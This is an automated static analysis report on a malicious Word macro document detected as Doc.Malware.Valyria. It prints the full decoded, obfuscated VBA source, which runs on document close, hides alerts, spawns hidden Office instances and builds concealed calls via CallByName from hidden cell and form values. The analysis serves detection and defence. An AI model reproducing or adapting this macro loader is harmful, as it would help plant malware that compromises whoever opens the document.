Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 8434cfd72202167e…

MALICIOUS

Office (OOXML)

71.8 KB Created: 2021-01-20 13:40:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2021-01-23
MD5: 58e6756f5bf380cce3a43799de0503e1 SHA-1: a8aa8ae3d1d066dcb64e693b69c64fbfc7d59af8 SHA-256: 8434cfd72202167ead9fb2620dfa2e850bc7b0c882c35838d5b1478a1136828b
222 Risk Score

Heuristics 5

  • ClamAV: Doc.Malware.Valyria-10033904-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Valyria-10033904-0
  • VBA project inside OOXML medium 2 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set r4 = CreateObject(UserForm1.ComboBox1)
  • CallByName call high OLE_VBA_CALLBYNAME
    CallByName call
    Matched line in script
    s4l = CallByName(Application, rm, 2)
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/10/21/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/9/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/10/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/11/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/12/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/13/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/14/chartexIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/inkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2017/model3dIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2018/wordml/cexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2016/wordml/cidIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2018/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 9139 bytes
SHA-256: e93dbbd6b43e6edb1d3f3126265eadcfa6d9e40175d10770da85d12b3ccf35e2
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Public wcm, g5u0y, sbihd, jtl, wi
Sub Document_Close()
n7 = Application.ProductCode
If ts > 3715 Then
v89 = Application.Options.InterpretHighAnsi
ts = v89
End If
nnn
End Sub
Sub nnn()
On Error Resume Next
Application.DisplayAlerts = False
v7vbv = Application.Options.ShowMarkupOpenSave
If n7 > 1625 Then
eqlq = Application.Options.ShortMenuNames
n7 = eqlq
End If
Err.Number = 0
UserForm2.ComboBox1.ListIndex = 2
kg = Application.Options.Pagination
If v7vbv > 4702 Then
oz = Application.Options.AutoFormatReplaceQuotes
v7vbv = oz
End If
psfas = Application.Options.MatchFuzzyProlongedSoundMark
If kg > 427 Then
n82 = Application.Options.UpdateLinksAtOpen
kg = n82
End If
xq = Application.Options.DefaultHighlightColorIndex
If psfas > 4599 Then
qn = Application.Options.DisableFeaturesbyDefault
psfas = qn
End If
Dim r4
Set r4 = CreateObject(UserForm1.ComboBox1)
ks6hb = Application.Options.CheckGrammarAsYouType
If xq > 4397 Then
xt4 = Application.CapsLock
xq = xt4
End If
r4.DisplayAlerts = False
rm = "visible"
mw = "OnTime"
Dim af5dn
io = 1
zrf = 1
While io <> 0 And zrf < 3
Set af5dn = r4.Workbooks.Open(FileName:=UserForm2.ComboBox1, Password:=UserForm1.ComboBox2)
io = Err.Number
zrf = zrf + 1
Wend
If io <> 0 Then
gv = Application.Options.AutoFormatReplaceOrdinals
y4 = Application.Options.MatchFuzzySpace
If gv > 4605 Then
b71rw = Application.CentimetersToPoints(59)
gv = b71rw
End If
s4l = CallByName(Application, rm, 2)
If s4l = True Then
Set h2y2 = CreateObject(UserForm1.ComboBox3)
h0th = Application.Options.AutoFormatReplaceFarEastDashes
If y4 > 302 Then
cle7k = Application.CheckSpelling("j0")
y4 = j0
End If
h2y2.Documents.Open ActiveDocument.FullName, ReadOnly:=True
h2y2.Run "ThisDocument.nnn"
h114 = Application.Options.ArabicMode
If h0th > 820 Then
u198e = Application.Options.AutoFormatAsYouTypeApplyFirstIndents
h0th = u198e
End If
i2 = Application.Options.AddHebDoubleQuote
If h114 > 626 Then
gk1d = Application.Options.DefaultOpenFormat
h114 = gk1d
End If
Else
UserForm1.ComboBox4 = UserForm1.ComboBox4 & "0"
Application.OnTime Now + TimeSerial(0, 0, 20), "ThisDocument.nnn"
End If
r4.Quit
jmbn = Application.Options.IgnoreMixedDigits
If i2 > 4741 Then
ps = Application.CentimetersToPoints(11)
i2 = ps
End If
Exit Sub
End If
Dim ij2j
Set ij2j = r4.sheets(1)
hgxr = "'"
rb8sm = r4.sheets(3).Cells(138, 43).Value
g5u0y = r4.sheets(2).Cells(189, 49).Value
wcm = r4.sheets(1).Cells(4, 42).Value
k17l = r4.sheets(2).Cells(192, 27).Value
e1qk = r4.sheets(3).Cells(230, 45).Value
uo76h = r4.sheets(3).Cells(61, 26).Value
o02uz = Application.Options.DefaultTextEncoding
If jmbn > 3900 Then
tn = Application.Options.PasteAdjustParagraphSpacing
jmbn = tn
End If
jw806 = Application.Options.AutoFormatAsYouTypeApplyFirstIndents
If o02uz > 3206 Then
ydeym = Application.Options.PictureEditor
o02uz = ydeym
End If
jfnmh = r4.sheets(2).Cells(21, 7).Value
o8 = r4.sheets(3).Cells(51, 38).Value
rgv = ij2j.Cells(92, 29).Value
fuco = r4.sheets(2).Cells(201, 28).Value
n22hw = Application.Options.MatchFuzzyCase
If jw806 > 3153 Then
z1c = Application.Options.AddControlCharacters
jw806 = z1c
End If
lb7 = r4.sheets(1).Cells(18, 15).Value
prm = r4.sheets(3).Cells(91, 3).Value
fqgd = r4.sheets(2).Cells(188, 22).Value
qqb = r4.sheets(3).Cells(240, 39).Value
bu = r4.sheets(3).Cells(164, 4).Value
xh = r4.sheets(3).Cells(69, 13).Value
b7m = r4.sheets(1).Cells(1, 28).Value
gr623 = Application.Options.SaveInterval
If n22hw > 2275 Then
dwo4f = Application.Options.ShortMenuNames
n22hw = dwo4f
End If
rm6yb = Application.Options.CheckHangulEndings
If gr623 > 4240 Then
lbnj = Application.Options.UseDiffDiacColor
gr623 = lbnj
End If
h8ta = Application.Options.IgnoreMixedDigits
If rm6yb > 2837 Then
whjyf = Application.Options.MeasurementUnit
rm6yb = whjyf
End If
mcthn = r4.sheets(2).Cells(214, 26).Value
oovot = r4.sheets(1).Cells(133, 11).Value
l4gr1 = r4.sheets(3).Cells(151, 9).Value
b4dib = r4.sheets(1).Cells(114, 21).Value
px2p = r4.sheets(2).Cells(55, 48).Value
wi = r4.sheets(1).Cells(32, 17).Value
zuldz = ij2j.Cells(49, 24).Value
zz = Application.Options.MultipleWordConversionsMode
If h8ta > 3183 Then
nc = Application.Options.HangulHanjaFastConversion
h8ta = nc
End If
dvw4j = r4.sheets(2).Cells(162, 25).Value
mrj = r4.sheets(1).Cells(173, 17).Value
tqb0 = CallByName(r4, rb8sm, 2)
Set fql15 = UserForm1.Controls.Add("Forms.ComboBox.1")
fql15.Value = jfnmh & tqb0 & l4gr1
Set vend1 = UserForm1.Controls.Add("Forms.ComboBox.1")
vend1.Value = dvw4j
CallByName CreateObject(lb7), fqgd, 1, fql15, e1qk, vend1
tn3bg = Application.Options.MatchFuzzyPunctuation
If zz > 303 Then
iln = Application.Options.SnapToGrid
zz = iln
End If
Set j6d = CreateObject(px2p)
n6 = Application.Options.DefaultTextEncoding
If tn3bg > 1874 Then
zgt = Application.Options.UseDiffDiacColor
tn3bg = zgt
End If
Set hai = CallByName(j6d, bu, 2)
Set cq7u = CallByName(hai, b4dib, 1)
Set mcthn = CallByName(j6d, mcthn, 2)
Set jtl = j6d
Set k17l = CallByName(mcthn, k17l, 2)
Set rgv = CallByName(k17l, rgv, 2)
Set ts = CallByName(rgv, mrj, 1, oovot)
Set wcm = CallByName(ts, wcm, 2)
qqb = CallByName(wcm, qqb, 2)
CallByName wcm, prm, 1, 1, qqb
Set sbihd = UserForm1.Controls.Add("Forms.ComboBox.1")
sbihd.Value = uo76h & b7m
UserForm3.ComboBox1 = fuco
sbihd.Value = zuldz
UserForm4.ComboBox1 = UserForm3.ComboBox1
UserForm3.ComboBox1 = qqb
j6d = Nothing
af5dn = Nothing
ij2j = Nothing
hai = Nothing
cq7u = Nothing
mcthn = Nothing
k17l = Nothing
cuan = Application.Options.DefaultHighlightColorIndex
rgv = Nothing
ts = Nothing
wcm = Nothing
rlnfy = Application.Options.ShowDiacritics
If cuan > 4321 Then
n = Application.CapsLock
cuan = n
End If
jtl = Nothing
DoEvents
wv = Application.Options.MatchFuzzyZJ
If rlnfy > 2253 Then
cuf6g = Application.Options.ShortMenuNames
rlnfy = cuf6g
End If
CallByName r4, o8, 1
r4 = Nothing
DoEvents
CallByName CreateObject(lb7), xh, 1, jfnmh & tqb0 & l4gr1
bxk5s = Application.Options.AutoFormatAsYouTypeReplaceSymbols
If wv > 447 Then
q5wc3 = Application.Options.AutoWordSelection
wv = q5wc3
End If
End Sub

Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{AB822AE0-A721-4E9C-A578-25F8EFB076B2}{3D63021F-8E0D-4B55-8C54-7A37E2DC834C}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "UserForm2"
Attribute VB_Base = "0{30315FF2-83E5-47CC-A2E4-180551C90594}{648DDFF3-441D-49B5-86FE-736AFF51699F}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Private Sub UserForm_Initialize()
 
 On Error GoTo ErrorHandler

 qi3ty = UserForm2.Controls.Count - 1
 
 If Len(UserForm1.ComboBox4) > 10 Then
 qi3ty = qi3ty * 2

dm9ra = Application.Options.PromptUpdateStyle

If k0kr > 880 Then


k8p6w = Application.Options.AutoFormatAsYouTypeApplyFirstIndents

k0kr = k8p6w


n0 = Application.Options.PasteAdjustTableFormatting


k0kr = Application.Options.VisualSelection

If n0 > 379 Then


i0 = Application.Options.AddControlCharacters

n0 = i0

End If

End If

 End If

etj0 = Application.Options.AutoFormatAsYouTypeApplyBulletedLists

If dm9ra > 443 Then


b7w = Application.Options.ShowControlCharacters

dm9ra = b7w

End If


 z3 = ""
 For j9 = 1 To qi3ty Step 2
 z3 = z3 & UserForm2.Controls.Item(j9)
 Next

 ComboBox1.AddItem "ek"
 ComboBox1.AddItem "zo"
 ComboBox1.AddItem z3
 ComboBox1.AddItem "x9se1"
 
 Exit Sub
 
ErrorHandler:
 
 
 
End Sub


Attribute VB_Name = "UserForm3"
Attribute VB_Base = "0{64B206EF-0C85-447C-95DB-FB08B608E4F4}{4B33854D-801C-4BEC-A203-96BC847A1E07}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Private Sub UserForm_Initialize()
 CallByName ActiveDocument.wcm, ActiveDocument.g5u0y, VbMethod, ActiveDocument.sbihd
End Sub

 

Attribute VB_Name = "UserForm4"
Attribute VB_Base = "0{2189CEA1-0435-42B0-BCFD-7D90AE524D22}{F5CAB12D-8A16-4ADD-B67D-84A22CC4E129}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Private Sub UserForm_Initialize()
 CallByName ActiveDocument.jtl, ActiveDocument.wi, VbMethod, ActiveDocument.sbihd
End Sub
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 43520 bytes
SHA-256: f5e8588be42162e02b95e4359f45b4f3911d87ba4dd224eb6e3616bc708e93ba
Detection
ClamAV: Doc.Malware.Valyria-10033904-0
Obfuscation or payload: unlikely

Open this report in the interactive analyzer, or submit your own file for analysis.